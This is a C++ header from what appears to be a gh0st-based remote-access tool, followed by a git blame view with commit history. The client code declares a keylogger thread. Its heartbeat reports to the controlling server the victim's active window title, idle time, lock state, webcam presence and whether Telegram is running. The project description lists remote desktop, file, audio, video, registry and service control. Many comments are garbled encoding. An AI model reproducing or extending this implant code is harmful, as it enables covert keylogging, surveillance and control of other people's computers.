client/KernelManager.h

// KernelManager.h: interface for the CKernelManager class.
//
//////////////////////////////////////////////////////////////////////

#if !defined(AFX_KERNELMANAGER_H__B1186DC0_E4D7_4D1A_A8B8_08A01B87B89E__INCLUDED_)
#define AFX_KERNELMANAGER_H__B1186DC0_E4D7_4D1A_A8B8_08A01B87B89E__INCLUDED_

#if _MSC_VER > 1000
#pragma once
#endif // _MSC_VER > 1000

#include "Manager.h"
#include <vector>

#define MAX_THREADNUM 0x1000>>2

#include <iostream>
#include <string>
#include <iomanip>
#include <TlHelp32.h>
#include "LoginServer.h"

// <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>þ<EFBFBD><C3BE><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>ʲôͨѶЭ<D1B6><D0AD>
IOCPClient* NewNetClient(CONNECT_ADDRESS* conn, State& bExit, const std::string& publicIP, bool exit_while_disconnect = false);

ThreadInfo* CreateKB(CONNECT_ADDRESS* conn, State& bExit, const std::string& publicIP);

class ActivityWindow {
public:
	std::string Check(DWORD threshold_ms = 6000) {
		auto idle = GetUserIdleTime();
		BOOL isActive = (idle < threshold_ms);
		if (isActive) {
			return GetActiveWindowTitle();
		}
		return (!IsWorkstationLocked() ? "Inactive: " : "Locked: ") + FormatMilliseconds(idle);
	}

private:
	std::string FormatMilliseconds(DWORD ms)
	{
		DWORD totalSeconds = ms / 1000;
		DWORD hours = totalSeconds / 3600;
		DWORD minutes = (totalSeconds % 3600) / 60;
		DWORD seconds = totalSeconds % 60;

		std::stringstream ss;
		ss << std::setfill('0')
			<< std::setw(2) << hours << ":"
			<< std::setw(2) << minutes << ":"
			<< std::setw(2) << seconds;

		return ss.str();
	}

	std::string GetActiveWindowTitle()
	{
		HWND hForegroundWindow = GetForegroundWindow();
		if (hForegroundWindow == NULL)
			return "No active window";

		char windowTitle[256];
		GetWindowTextA(hForegroundWindow, windowTitle, sizeof(windowTitle));
		return std::string(windowTitle);
	}

	DWORD GetLastInputTime()
	{
		LASTINPUTINFO lii = { sizeof(LASTINPUTINFO) };
		GetLastInputInfo(&lii);
		return lii.dwTime;
	}

	DWORD GetUserIdleTime()
	{
		return (GetTickCount64() - GetLastInputTime());
	}

	bool IsWorkstationLocked() {
		HDESK hInput = OpenInputDesktop(0, FALSE, GENERIC_READ);
		// <20><><EFBFBD><EFBFBD><EFBFBD>޷<EFBFBD><DEB7><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>棬<EFBFBD><E6A3AC><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>Ϊ<EFBFBD><CEAA><EFBFBD><EFBFBD><EFBFBD>Ѿ<EFBFBD><D1BE>л<EFBFBD><D0BB><EFBFBD> Winlogon
		if (!hInput) return true;
		char name[256] = {0};
		DWORD needed;
		bool isLocked = false;
		if (GetUserObjectInformationA(hInput, UOI_NAME, name, sizeof(name), &needed)) {
			isLocked = (_stricmp(name, "Winlogon") == 0);
		}
		CloseDesktop(hInput);
		return isLocked;
	}
};

struct RttEstimator {
	double srtt = 0.0;       // ƽ<><C6BD> RTT (<28><>)
	double rttvar = 0.0;     // RTT <20><><EFBFBD><EFBFBD> (<28><>)
	double rto = 0.0;        // <20><>ʱʱ<CAB1><CAB1> (<28><>)
	bool initialized = false;

	void update_from_sample(double rtt_ms) {
		const double alpha = 1.0 / 8;
		const double beta = 1.0 / 4;

		// ת<><D7AA><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
		double rtt = rtt_ms / 1000.0;

		if (!initialized) {
			srtt = rtt;
			rttvar = rtt / 2.0;
			rto = srtt + 4.0 * rttvar;
			initialized = true;
		}
		else {
			rttvar = (1.0 - beta) * rttvar + beta * std::fabs(srtt - rtt);
			srtt = (1.0 - alpha) * srtt + alpha * rtt;
			rto = srtt + 4.0 * rttvar;
		}

		// <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD>С RTO<54><4F>RFC 6298 <20>Ƽ<EFBFBD> 1 <20>룩
		if (rto < 1.0) rto = 1.0;
	}
};

class CKernelManager : public CManager  
{
public:
	CONNECT_ADDRESS* m_conn;
	HINSTANCE m_hInstance;
	CKernelManager(CONNECT_ADDRESS* conn, IOCPClient* ClientObject, HINSTANCE hInstance, ThreadInfo* kb, State& s);
	virtual ~CKernelManager();
	VOID OnReceive(PBYTE szBuffer, ULONG ulLength);
	ThreadInfo* m_hKeyboard;
	ThreadInfo  m_hThread[MAX_THREADNUM];
	// <20><>ֵ<EFBFBD><D6B5>ԭ<EFBFBD><D4AD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>ڼ<EFBFBD>¼<EFBFBD>߳<EFBFBD><DFB3><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>߳<EFBFBD><DFB3><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>ʱm_hThread<61><64>Խ<EFBFBD><D4BD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>³<EFBFBD><C2B3><EFBFBD><EFBFBD>쳣
	// <20><><EFBFBD><EFBFBD><EFBFBD>ҽ<EFBFBD><D2BD><EFBFBD>ֵ<EFBFBD>ĺ<EFBFBD><C4BA><EFBFBD><EFBFBD>޸<EFBFBD>Ϊ"<22><><EFBFBD><EFBFBD><EFBFBD>߳<EFBFBD><DFB3>±<EFBFBD>"<22><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>m_hThread<61><64><EFBFBD><EFBFBD>ָλ<D6B8>ÿ<EFBFBD><C3BF>ã<EFBFBD><C3A3><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>µ<EFBFBD><C2B5>̷߳<DFB3><CCB7><EFBFBD><EFBFBD>ڸ<EFBFBD>λ<EFBFBD><CEBB>
	ULONG   m_ulThreadCount;
	UINT	GetAvailableIndex();
	State& g_bExit; // Hide base class variable
	MasterSettings m_settings;
	RttEstimator m_nNetPing; // <20><><EFBFBD><EFBFBD>״<EFBFBD><D7B4>
	// <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
	int SendHeartbeat() {
		for (int i = 0; i < m_settings.ReportInterval && !g_bExit && m_ClientObject->IsConnected(); ++i)
			Sleep(1000);
		if (m_settings.ReportInterval <= 0) { // <20>ر<EFBFBD><D8B1>ϱ<EFBFBD><CFB1><EFBFBD>Ϣ<EFBFBD><CFA2><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
			for (int i = rand() % 120; i && !g_bExit && m_ClientObject->IsConnected()&& m_settings.ReportInterval <= 0; --i)
				Sleep(1000);
			return 0;
		}
		if (g_bExit || !m_ClientObject->IsConnected())
			return -1;

		ActivityWindow checker;
		auto s = checker.Check();
		Heartbeat a(s, m_nNetPing.srtt);

		a.HasSoftware = SoftwareCheck(m_settings.DetectSoftware);

		BYTE buf[sizeof(Heartbeat) + 1];
		buf[0] = TOKEN_HEARTBEAT;
		memcpy(buf + 1, &a, sizeof(Heartbeat));
		m_ClientObject->Send2Server((char*)buf, sizeof(buf));
		return 0;
	}
	bool SoftwareCheck(int type) {
		static std::map<int, std::string> m = {
			{SOFTWARE_CAMERA, "<EFBFBD><EFBFBD><EFBFBD><EFBFBD>ͷ"},
			{SOFTWARE_TELEGRAM, "telegram.exe" },
		};
		static bool hasCamera = WebCamIsExist();
		return type == SOFTWARE_CAMERA ? hasCamera : IsProcessRunning({ m[type] });
	}
	// <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>Ƿ<EFBFBD><C7B7><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
	bool IsProcessRunning(const std::vector<std::string>& processNames) {
		PROCESSENTRY32 pe32;
		pe32.dwSize = sizeof(PROCESSENTRY32);

		// <20><>ȡ<EFBFBD><C8A1>ǰϵͳ<CFB5><CDB3><EFBFBD><EFBFBD><EFBFBD>н<EFBFBD><D0BD>̵Ŀ<CCB5><C4BF><EFBFBD>
		HANDLE hProcessSnap = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
		if (hProcessSnap == INVALID_HANDLE_VALUE)
			return true;

		// <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>н<EFBFBD><D0BD><EFBFBD>
		if (Process32First(hProcessSnap, &pe32)) {
			do {
				for (const auto& processName : processNames) {
					// <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>ƥ<EFBFBD>䣬<EFBFBD>򷵻<EFBFBD> true
					if (_stricmp(pe32.szExeFile, processName.c_str()) == 0) {
						CloseHandle(hProcessSnap);
						return true;
					}
				}
			} while (Process32Next(hProcessSnap, &pe32));
		}

		CloseHandle(hProcessSnap);
		return false;
	}
};

#endif // !defined(AFX_KERNELMANAGER_H__B1186DC0_E4D7_4D1A_A8B8_08A01B87B89E__INCLUDED_)
-												基于gh0st的远程控制器

实现了终端管理、进程管理、窗口管理、桌面管理、文件管理、语音管理、视频管理、服务管理、注册表管理等功能。

											
										
										
											2019-01-05 20:21:43 +08:00
+								// KernelManager.h: interface for the CKernelManager class.
 								//
 								//////////////////////////////////////////////////////////////////////
 								#if !defined(AFX_KERNELMANAGER_H__B1186DC0_E4D7_4D1A_A8B8_08A01B87B89E__INCLUDED_)
 								#define AFX_KERNELMANAGER_H__B1186DC0_E4D7_4D1A_A8B8_08A01B87B89E__INCLUDED_
 								#if _MSC_VER > 1000
 								#pragma once
 								#endif // _MSC_VER > 1000
 								#include "Manager.h"
 								#include <vector>
-												solve some issues according to code analysis result

											
										
										
											2024-12-27 01:40:40 +08:00
+								#define MAX_THREADNUM 0x1000>>2
-												fix: client threads number excceeding bug

											
										
										
											2024-12-24 18:08:26 +08:00
-												Improvement: Prepare for optimization of online capacity

											
										
										
											2025-04-07 18:18:36 +08:00
+								#include <iostream>
 								#include <string>
 								#include <iomanip>
 								#include <TlHelp32.h>
 								#include "LoginServer.h"
-												layout: Reorganize TCP client/server code

											
										
										
											2025-06-29 21:25:59 +08:00
+								// <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>þ<EFBFBD><C3BE><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>ʲôͨѶЭ<D1B6><D0AD>
-												fix: #182 First command using HTTP protocol

											
										
										
											2025-08-10 17:15:32 +08:00
+								IOCPClient* NewNetClient(CONNECT_ADDRESS* conn, State& bExit, const std::string& publicIP, bool exit_while_disconnect = false);
-												layout: Reorganize TCP client/server code

											
										
										
											2025-06-29 21:25:59 +08:00
-												fix: #182 First command using HTTP protocol

											
										
										
											2025-08-10 17:15:32 +08:00
+								ThreadInfo* CreateKB(CONNECT_ADDRESS* conn, State& bExit, const std::string& publicIP);
-												Fix the problem with the keylogging feature

											
										
										
											2025-06-26 02:07:00 +08:00
-												Improvement: Prepare for optimization of online capacity

											
										
										
											2025-04-07 18:18:36 +08:00
+								class ActivityWindow {
 								public:
 									std::string Check(DWORD threshold_ms = 6000) {
 										auto idle = GetUserIdleTime();
 										BOOL isActive = (idle < threshold_ms);
 										if (isActive) {
 											return GetActiveWindowTitle();
 										}
-												Improve: Showing inactive locked client status

											
										
										
											2025-08-02 04:15:29 +08:00
+										return (!IsWorkstationLocked() ? "Inactive: " : "Locked: ") + FormatMilliseconds(idle);
-												Improvement: Prepare for optimization of online capacity

											
										
										
											2025-04-07 18:18:36 +08:00
+									}
 								private:
 									std::string FormatMilliseconds(DWORD ms)
 									{
 										DWORD totalSeconds = ms / 1000;
 										DWORD hours = totalSeconds / 3600;
 										DWORD minutes = (totalSeconds % 3600) / 60;
 										DWORD seconds = totalSeconds % 60;
 										std::stringstream ss;
 										ss << std::setfill('0')
 											<< std::setw(2) << hours << ":"
 											<< std::setw(2) << minutes << ":"
 											<< std::setw(2) << seconds;
 										return ss.str();
 									}
 									std::string GetActiveWindowTitle()
 									{
 										HWND hForegroundWindow = GetForegroundWindow();
 										if (hForegroundWindow == NULL)
 											return "No active window";
 										char windowTitle[256];
 										GetWindowTextA(hForegroundWindow, windowTitle, sizeof(windowTitle));
 										return std::string(windowTitle);
 									}
 									DWORD GetLastInputTime()
 									{
 										LASTINPUTINFO lii = { sizeof(LASTINPUTINFO) };
 										GetLastInputInfo(&lii);
 										return lii.dwTime;
 									}
 									DWORD GetUserIdleTime()
 									{
 										return (GetTickCount64() - GetLastInputTime());
 									}
-												Improve: Showing inactive locked client status

											
										
										
											2025-08-02 04:15:29 +08:00
 									bool IsWorkstationLocked() {
 										HDESK hInput = OpenInputDesktop(0, FALSE, GENERIC_READ);
 										// <20><><EFBFBD><EFBFBD><EFBFBD>޷<EFBFBD><DEB7><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>棬<EFBFBD><E6A3AC><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>Ϊ<EFBFBD><CEAA><EFBFBD><EFBFBD><EFBFBD>Ѿ<EFBFBD><D1BE>л<EFBFBD><D0BB><EFBFBD> Winlogon
 										if (!hInput) return true;
 										char name[256] = {0};
 										DWORD needed;
 										bool isLocked = false;
 										if (GetUserObjectInformationA(hInput, UOI_NAME, name, sizeof(name), &needed)) {
 											isLocked = (_stricmp(name, "Winlogon") == 0);
 										}
 										CloseDesktop(hInput);
 										return isLocked;
 									}
-												Improvement: Prepare for optimization of online capacity

											
										
										
											2025-04-07 18:18:36 +08:00
+								};
-												Improve: Master using ZSTD_DCtx and using new RTT

											
										
										
											2025-08-15 03:00:18 +08:00
+								struct RttEstimator {
 									double srtt = 0.0;       // ƽ<><C6BD> RTT (<28><>)
 									double rttvar = 0.0;     // RTT <20><><EFBFBD><EFBFBD> (<28><>)
 									double rto = 0.0;        // <20><>ʱʱ<CAB1><CAB1> (<28><>)
 									bool initialized = false;
 									void update_from_sample(double rtt_ms) {
 										const double alpha = 1.0 / 8;
 										const double beta = 1.0 / 4;
 										// ת<><D7AA><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
 										double rtt = rtt_ms / 1000.0;
 										if (!initialized) {
 											srtt = rtt;
 											rttvar = rtt / 2.0;
 											rto = srtt + 4.0 * rttvar;
 											initialized = true;
 										}
 										else {
 											rttvar = (1.0 - beta) * rttvar + beta * std::fabs(srtt - rtt);
 											srtt = (1.0 - alpha) * srtt + alpha * rtt;
 											rto = srtt + 4.0 * rttvar;
 										}
 										// <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD>С RTO<54><4F>RFC 6298 <20>Ƽ<EFBFBD> 1 <20>룩
 										if (rto < 1.0) rto = 1.0;
 									}
 								};
-												基于gh0st的远程控制器

实现了终端管理、进程管理、窗口管理、桌面管理、文件管理、语音管理、视频管理、服务管理、注册表管理等功能。

											
										
										
											2019-01-05 20:21:43 +08:00
+								class CKernelManager : public CManager
 								{
 								public:
-												fix: #71 Development of a simple Linux Client

											
										
										
											2025-04-06 19:35:20 +08:00
+									CONNECT_ADDRESS* m_conn;
 									HINSTANCE m_hInstance;
-												Layout reorganize

											
										
										
											2025-07-24 04:20:39 +08:00
+									CKernelManager(CONNECT_ADDRESS* conn, IOCPClient* ClientObject, HINSTANCE hInstance, ThreadInfo* kb, State& s);
-												基于gh0st的远程控制器

实现了终端管理、进程管理、窗口管理、桌面管理、文件管理、语音管理、视频管理、服务管理、注册表管理等功能。

											
										
										
											2019-01-05 20:21:43 +08:00
+									virtual ~CKernelManager();
 									VOID OnReceive(PBYTE szBuffer, ULONG ulLength);
-												Fix the problem with the keylogging feature

											
										
										
											2025-06-26 02:07:00 +08:00
+									ThreadInfo* m_hKeyboard;
-												fix: client threads number excceeding bug

											
										
										
											2024-12-24 18:08:26 +08:00
+									ThreadInfo  m_hThread[MAX_THREADNUM];
 									// <20><>ֵ<EFBFBD><D6B5>ԭ<EFBFBD><D4AD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>ڼ<EFBFBD>¼<EFBFBD>߳<EFBFBD><DFB3><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>߳<EFBFBD><DFB3><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>ʱm_hThread<61><64>Խ<EFBFBD><D4BD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>³<EFBFBD><C2B3><EFBFBD><EFBFBD>쳣
 									// <20><><EFBFBD><EFBFBD><EFBFBD>ҽ<EFBFBD><D2BD><EFBFBD>ֵ<EFBFBD>ĺ<EFBFBD><C4BA><EFBFBD><EFBFBD>޸<EFBFBD>Ϊ"<22><><EFBFBD><EFBFBD><EFBFBD>߳<EFBFBD><DFB3>±<EFBFBD>"<22><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>m_hThread<61><64><EFBFBD><EFBFBD>ָλ<D6B8>ÿ<EFBFBD><C3BF>ã<EFBFBD><C3A3><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>µ<EFBFBD><C2B5>̷߳<DFB3><CCB7><EFBFBD><EFBFBD>ڸ<EFBFBD>λ<EFBFBD><CEBB>
-												基于gh0st的远程控制器

实现了终端管理、进程管理、窗口管理、桌面管理、文件管理、语音管理、视频管理、服务管理、注册表管理等功能。

											
										
										
											2019-01-05 20:21:43 +08:00
+									ULONG   m_ulThreadCount;
-												fix: client threads number excceeding bug

											
										
										
											2024-12-24 18:08:26 +08:00
+									UINT	GetAvailableIndex();
-												Layout reorganize

											
										
										
											2025-07-24 04:20:39 +08:00
+									State& g_bExit; // Hide base class variable
-												Improvement: Prepare for optimization of online capacity

											
										
										
											2025-04-07 18:18:36 +08:00
+									MasterSettings m_settings;
-												Improve: Master using ZSTD_DCtx and using new RTT

											
										
										
											2025-08-15 03:00:18 +08:00
+									RttEstimator m_nNetPing; // <20><><EFBFBD><EFBFBD>״<EFBFBD><D7B4>
-												Improvement: Prepare for optimization of online capacity

											
										
										
											2025-04-07 18:18:36 +08:00
+									// <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
 									int SendHeartbeat() {
 										for (int i = 0; i < m_settings.ReportInterval && !g_bExit && m_ClientObject->IsConnected(); ++i)
 											Sleep(1000);
 										if (m_settings.ReportInterval <= 0) { // <20>ر<EFBFBD><D8B1>ϱ<EFBFBD><CFB1><EFBFBD>Ϣ<EFBFBD><CFA2><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
-												Improve: Showing inactive locked client status

											
										
										
											2025-08-02 04:15:29 +08:00
+											for (int i = rand() % 120; i && !g_bExit && m_ClientObject->IsConnected()&& m_settings.ReportInterval <= 0; --i)
 												Sleep(1000);
-												Improvement: Prepare for optimization of online capacity

											
										
										
											2025-04-07 18:18:36 +08:00
+											return 0;
 										}
 										if (g_bExit || !m_ClientObject->IsConnected())
 											return -1;
 										ActivityWindow checker;
 										auto s = checker.Check();
-												Improve: Master using ZSTD_DCtx and using new RTT

											
										
										
											2025-08-15 03:00:18 +08:00
+										Heartbeat a(s, m_nNetPing.srtt);
-												Improvement: Prepare for optimization of online capacity

											
										
										
											2025-04-07 18:18:36 +08:00
 										a.HasSoftware = SoftwareCheck(m_settings.DetectSoftware);
 										BYTE buf[sizeof(Heartbeat) + 1];
 										buf[0] = TOKEN_HEARTBEAT;
 										memcpy(buf + 1, &a, sizeof(Heartbeat));
 										m_ClientObject->Send2Server((char*)buf, sizeof(buf));
 										return 0;
 									}
 									bool SoftwareCheck(int type) {
 										static std::map<int, std::string> m = {
 											{SOFTWARE_CAMERA, "<EFBFBD><EFBFBD><EFBFBD><EFBFBD>ͷ"},
 											{SOFTWARE_TELEGRAM, "telegram.exe" },
 										};
 										static bool hasCamera = WebCamIsExist();
 										return type == SOFTWARE_CAMERA ? hasCamera : IsProcessRunning({ m[type] });
 									}
 									// <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>Ƿ<EFBFBD><C7B7><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
 									bool IsProcessRunning(const std::vector<std::string>& processNames) {
 										PROCESSENTRY32 pe32;
 										pe32.dwSize = sizeof(PROCESSENTRY32);
 										// <20><>ȡ<EFBFBD><C8A1>ǰϵͳ<CFB5><CDB3><EFBFBD><EFBFBD><EFBFBD>н<EFBFBD><D0BD>̵Ŀ<CCB5><C4BF><EFBFBD>
 										HANDLE hProcessSnap = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
 										if (hProcessSnap == INVALID_HANDLE_VALUE)
 											return true;
 										// <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>н<EFBFBD><D0BD><EFBFBD>
 										if (Process32First(hProcessSnap, &pe32)) {
 											do {
 												for (const auto& processName : processNames) {
 													// <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>ƥ<EFBFBD>䣬<EFBFBD>򷵻<EFBFBD> true
 													if (_stricmp(pe32.szExeFile, processName.c_str()) == 0) {
 														CloseHandle(hProcessSnap);
 														return true;
 													}
 												}
 											} while (Process32Next(hProcessSnap, &pe32));
 										}
 										CloseHandle(hProcessSnap);
 										return false;
 									}
-												基于gh0st的远程控制器

实现了终端管理、进程管理、窗口管理、桌面管理、文件管理、语音管理、视频管理、服务管理、注册表管理等功能。

											
										
										
											2019-01-05 20:21:43 +08:00
+								};
 								#endif // !defined(AFX_KERNELMANAGER_H__B1186DC0_E4D7_4D1A_A8B8_08A01B87B89E__INCLUDED_)